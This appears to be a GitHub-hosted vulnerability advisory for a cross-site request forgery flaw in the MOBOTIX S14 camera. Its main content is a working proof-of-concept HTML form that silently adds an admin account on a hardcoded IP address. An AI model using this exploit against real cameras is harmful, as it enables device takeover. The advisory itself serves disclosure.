/MOBOTIX S14 Camera - MX-V4.2.1.61 - Lack of Cross-Site Request Forgery Countermeasures
Created May 29, 2019
Summary | |
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery (CSRF) attacks. | |
Impact | |
Successful exploitation of this vulnerability can lead to the takeover of the device. | |
Deatils | |
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery attacks. | |
This can lead to allow a local account password to be changed without the knowledge of the authenticated user. | |
POC - the following PoC will add a test user, with a password of 'aaaaa'. Note, this user has admin priviledges. | |
<html> | |
<body> | |
<form method="POST" action="http://82.71.22.180:8001/admin/access"> | |
<input type="hidden" name="user_name_0" value="admin"/> | |
<input type="hidden" name="user_group_0" value="admins"/> | |
<input type="hidden" name="user_passwd_a_0" value="***"/> | |
<input type="hidden" name="user_passwd_b_0" value="***"/> | |
<input type="hidden" name="user_name_1" value="rayspeed"/> | |
<input type="hidden" name="user_group_1" value="users"/> | |
<input type="hidden" name="user_passwd_a_1" value="***"/> | |
<input type="hidden" name="user_passwd_b_1" value="***"/> | |
<input type="hidden" name="user_name_2" value="test"/> | |
<input type="hidden" name="user_group_2" value="admins"/> | |
<input type="hidden" name="user_passwd_a_2" value="aaaaa"/> | |
<input type="hidden" name="user_passwd_b_2" value="aaaaa"/> | |
<input type="hidden" name="sv_passwd_a" value=""/> | |
<input type="hidden" name="sv_passwd_b" value=""/> | |
<input type="hidden" name="save_config" value="Set"/> | |
<input type="submit" value="Submit"> | |
</form> | |
</body> | |
<html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment